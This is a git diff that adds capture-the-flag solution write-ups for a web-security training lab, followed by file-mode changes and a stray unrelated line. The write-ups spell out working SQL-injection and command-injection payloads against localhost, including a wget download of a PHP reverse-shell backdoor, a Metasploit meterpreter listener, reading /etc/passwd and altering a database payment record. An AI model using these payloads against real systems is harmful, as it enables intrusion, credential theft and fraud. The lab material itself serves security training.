+inject into table and get the username and password for admin
+
+admin : TheAdminPassw0rd
+
+Congratulations You Tried Your Best (y)
+
+Hope you enjoyed this challenge and Learned some new Things about WebApp Security !!!
diff --git a/solution/ch043_solution.txt b/solution/ch043_solution.txt
new file mode 100644
index 00000000..b450c8a7
--- /dev/null
+++ b/solution/ch043_solution.txt
@@ -0,0 +1,32 @@
+Challenge 043 : Experienced Injection Challenge
+
+YOU're logged in a user and when u notice the url it's a GET request.. so we might some thing like sql injection seems easy..
+http://localhost:8008/inside/main_index.php?id=1'
+getting a simple erroe on adding of ' at the end
+That means, for sure SQL injection is possible in this
+let's dig a bit deeper
+' -- - doesnt works
+Spaces are Filtered :/
+Filters Filters everywhere.. Developer has worked out some !!
+
+http://localhost/sqli-labs/Less-26/?id=1'&&'1
+http://localhost/sqli-labs/Less-26/?id=1%27%A0union%A0all%A0select%A01,2,3%26%26%20%271
+http://localhost/sqli-labs/Less-26/?id=1777%27union%A0all%A0select%A01,2,3%26%26%271
+
+this was good.. actually.. spaces are filtered some and also and and or.. so url encoding and any random character at that place and the query works
+
+http://localhost:8008/inside/main_index.php?id=777%27union%A0all%A0select%A01,database%28%29,group_concat%28table_name%29%A0from%A0information_schema.tables%A0where%A0table_schema=database%28%29%26%26%271
+
+http://localhost:8008/inside/main_index.php?id=777%27union%A0all%A0select%A01,group_concat%28table_name%29,3%A0from%A0information_schema.tables%A0where%A0table_schema=database%28%29%26%26%271
+gives : emails and users table
+
+
+http://localhost:8008/inside/main_index.php?id=777%27union%A0all%A0select%A01,group_concat%28column_name%29,3%A0from%A0information_schema.columns%A0where%A0table_name=%27users%27%26%26%271
+
+dump the admin username and password
+theadmin : theadmin123
+
+/robots.txt : gives u the admin page
+
+Successful !!
+Hope you enjoyed this challenge !!!
diff --git a/solution/ch044_solution.txt b/solution/ch044_solution.txt
new file mode 100644
index 00000000..e96a3153
--- /dev/null
+++ b/solution/ch044_solution.txt
@@ -0,0 +1,31 @@
+Challenge 044 : Command Injection Easy
+
+A simple web page that pings and tells you the information abt the web server.
+google.com : gives the result as such
+fb.com : gives the result like 200 OK or 301 redirect
+and other information too lot of information
+
+let's try something else
+ls
+whoami
+
+google.com; ls
+google.com && ls
+doesnt' work all filtered
+
+let's try
+google.com || ls .. this too filtered
+
+kk the blacklist is provided to you.. so you know the symbols that are blocked.. like ; & | are blocked
+ || --> ''
+
+ and '| ' --> ''
+ aah.. there's no filter for '|'
+
+let's tryy google.com |ls -al
+and boom u're able to get all the files in the directory
+
+cat the EPL.txt and enter it on the login page
+
+Hope You enjoyed it !!!
+
diff --git a/solution/ch045_solution.txt b/solution/ch045_solution.txt
new file mode 100644
index 00000000..27d664d2
--- /dev/null
+++ b/solution/ch045_solution.txt
@@ -0,0 +1,57 @@
+Challenge 045 : Tricky Injection Challenge Trip To Dawki RCE
+
+Looks like a paint blog of student
+
+let's put input at the ip_searchfield
+' "
+8.8.8.8
+8.8.8.8; whoami
+8.8.8.8 && whoami
+
+127.0.0.1 || ls -al : gives the ouput of ping and as well all the files in the same directory
+
+from given information payload file was WAS backdoor.php
+here the list shows the file could be backdoor.txt
+let's see the content of it
+
+1.1.1.1 || cat backdoor.txt
+looks like encoded.. let's copy this content of text file onto some of our notepad and decode it.
+first urldecode and then base64 decode it.. u'll get a php code.. looks like a php backdoor that establishes a reverse connection on the specified LHOST and LPORT look like a local ip.. let's edit this payload to get the connection to our ip.. with lhost as "your ip" my case : 192.168.0.104 and let the LPORT be 4444
+
+Add tags at the start and end of the backdoor
+let's save this file on our local system on localhost as backdoor.txt
+
+let's get this edited backdoor on the SERVER
+searchfield : || wget http://192.168.0.104/backdoor.txt -O backdoor.php
+searchfield : `wget http://192.168.0.104/backdoor.txt -O backdoor.php` 192.168.0.104 is my ip.. check in for ur case : ifconfig
+ `wget http://192.168.0.104/backdoor.txt -O backdoor.php`
+
+now 127.0.0.1 || ls -al gives backdoor.php
+
+let's execute this php.. before that
+let's FIRE up metasploit or armitage and turn up our listener
+
+armitage :
+use exploit/multi/handler
+set PAYLOAD php/meterpreter/reverse_tcp
+show options
+set LHOST 192.168.0.104
+set LPORT 4444
+
+exploit
+
+now let's execute our backdoor.php
+searchfield : 11.1.1.11 || php -f backdoor.php
+
+and u'll get the meterpreter session started on ur armitage.. gaining access to the server.. let's do our work now :D
+
+
+echo "show databases;" | mysql -u root --password=password //gives all the databases.. we need TripDawki
+echo "select * from TripDawki.students;" | mysql -u root --password=password //select that database
+echo "UPDATE TripDawki.students set payment='PAID' where id=15;" | mysql -u root --password=password //our target change the payment mode to PAID
+
+DONE !!
+
+play around with the server YOU have REMOTE access to it.
+
+HOPE you enjoyed this challenge !!!
diff --git a/solution/ch046_solution.txt b/solution/ch046_solution.txt
new file mode 100644
index 00000000..da6e4823
--- /dev/null
+++ b/solution/ch046_solution.txt
@@ -0,0 +1,40 @@
+Challenge 046 : Medium Level command injection
+
+It's a simple web page that converts to sha256 prolly
+let's try some random inputs
+
+try me || uname -a
+;ls -al
+try me; ls
+
+notice carefully at the end there is "-" sign which is linuxcli md5sum program (Google it)
+it gives us the idea that command at the backend is something like : echo "string" | sha256sum
+
+
+GET /index.php?string=try : (try)
+ 95fdbdf2fea4b306d059facf26c18d94cb190189a3221008eca14c5dd0b0fce1 -
+
+GET /index.php?string=lol;%20try : (lol; try)
+ e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 -
+
+GET /index.php?string=lol;%20echo%20try : (lol; echo try)
+ 95fdbdf2fea4b306d059facf26c18d94cb190189a3221008eca14c5dd0b0fce1 -
+
+The output of 1 and 3 is same, so it does mean that
+the command goes like
+echo lol; echo try | sha56sum .. so it prints lol first and then applies sha256sum on try
+
+so, command injection is possible :D
+
+let's try : try me;ls -al; something
+ lol%3Bls%20-al;echo+try
+
+it will list all the files in that directory.. and there's ur file : EPL.txt
+
+get value : lol%3Bcat%20EPL.txt;echo+try
+get request : test;%20cat%20/etc/passwd;%20something
+cat file EPL.txt to get the flag i.e. : thenew_flag
+
+you can play around now leading this to Remote Code Execution on the main server.. there might be something more hidden on it ;)
+
+
diff --git a/solution/ch048_solution.txt b/solution/ch048_solution.txt
new file mode 100755
index 00000000..9516309e
--- /dev/null
+++ b/solution/ch048_solution.txt
@@ -0,0 +1,61 @@
+Challenge 048 : Medium CTF Challenge
+
+Welcome to CTF.
+Looks like a simple page with simple source, usually simple pages have most things hidden in them.
+Complete White Background Suspicious
+
+CTRL + A page and scroll down u notice a hint there hidden.. shows "robots.txt"
+OR you can also scroll down the source page and get that hint.
+
+User-agent: *
+Disallow: /dir/indexX.php //suspiciuos page
+
+User-agent: *
+Disallow: /inside/submit.php //submit flag page
+
+/inside/submit.php : checking this directory out nothing here, this page is to submit the flag
+/dir/ directory too, nthing here except
+/dir/indexX.php : says protected area, enter the site :
+asks for username and password saying : Protected Area !!
+admin:admin admin:pass doesnt works so surely, it's not made for guessing
+
+this page heads to /dir/secret/ okay.. but we dont have the username and password for it.
+
+This authentication might be of .htaccess file so let's use curl to check out request methods allowed and use different http methods to this /secret dir.
+
+curl -X OPTIONS -v http://locahost:8008/dir/secret : we can see all methods are allowed
+let's use GET for checking and it gives 200 OK !! WOhhhhh Bypassed !!!
+
+So, the fault in .htaccess file is that.. it just limits and authenticates on POST http method request.
+
+so if u just type or reload url : http://localhost:8008/dir/secret/ you will be able to access the page :D
+
+Good one Wats Next.. It's not as easy as it looks 0_0
+
+(White Background always makes me suspicious)
+CTRAL + A --> gives me that "It's not as easy as it looks" is an image okay,
+let's check out the susp image directory
+http://localhost:8008/dir/secret/images/its.jpg
+
+there's another file in images/ : image.jpeg
+which contains "errors" so let's check out these "errors" save this file first.
+
+image.jpeg
+view contents using "strings image.jpeg" or cat or gedit.. it shows.. some random strings.. n also s string name "sec.wav" might be an audio file
+using "file image.jpeg" u'll see that it gives zip archive, kk so this a zip file
+
+rename "image.jpeg" --> "image.zip"
+extract it : u'll get a wav audio file.. named sec.wav let's check this out
+audio is kind of random, might have something hidden inside it, steganography.
+Google out Steganography if u've never heard of this term.
+
+let's figure this audio using Sonic Visualiser
+looks like a simple audio file.. let's add sprectrogram filter and there you go --> PIKACHU
+
+so, this was an image file that was rendered blue and then converted to audio file :D
+
+so the flag is : PIKACHU
+
+Successful !!!
+
+Hope You Learned Some new things and Enjoyed this Challenge !!!
diff --git a/user/plugins/article-challenge-connect/class.ArticleChallengeModel.php b/user/plugins/article-challenge-connect/class.ArticleChallengeModel.php
old mode 100644
new mode 100755
diff --git a/user/plugins/article-challenge-connect/editarticle.tpl b/user/plugins/article-challenge-connect/editarticle.tpl
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/addchallenge.tpl b/user/plugins/challenge-clues/addchallenge.tpl
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/challenge-clues.php b/user/plugins/challenge-clues/challenge-clues.php
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/class.Clue.php b/user/plugins/challenge-clues/class.Clue.php
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/class.UserCluesModel.php b/user/plugins/challenge-clues/class.UserCluesModel.php
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/editchallenge.tpl b/user/plugins/challenge-clues/editchallenge.tpl
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/install-plugin.sql b/user/plugins/challenge-clues/install-plugin.sql
old mode 100644
new mode 100755
diff --git a/user/plugins/challenge-clues/showChallenge.tpl b/user/plugins/challenge-clues/showChallenge.tpl
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/admin/view/menumanager.tpl b/user/themes/custom-theme/admin/view/menumanager.tpl
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/admin/view/options.tpl b/user/themes/custom-theme/admin/view/options.tpl
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/custom-theme.php b/user/themes/custom-theme/custom-theme.php
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/view/images/logo.jpg b/user/themes/custom-theme/view/images/logo.jpg
old mode 100644
new mode 100755
diff --git a/user/themes/custom-theme/view/images/pictogram.gif b/user/themes/custom-theme/view/images/pictogram.gif
old mode 100644
new mode 100755
diff --git a/view/_footer_frontend.tpl b/view/_footer_frontend.tpl
old mode 100644
new mode 100755
diff --git a/view/challenge_list.tpl b/view/challenge_list.tpl
old mode 100644
new mode 100755
diff --git a/view/errors/403.html b/view/errors/403.html
old mode 100644
new mode 100755
diff --git a/view/errors/404.html b/view/errors/404.html
old mode 100644
new mode 100755
diff --git a/view/progressreport.tpl b/view/progressreport.tpl
old mode 100644
new mode 100755
diff --git a/view/showChallenge.tpl b/view/showChallenge.tpl
old mode 100644
new mode 100755
+ 
+
+ 
+ 
+ 
+ 
+ 
+ 
+ 
The hovered thumbnail style is achieved simply through a background image:
+ 
+ 
+ 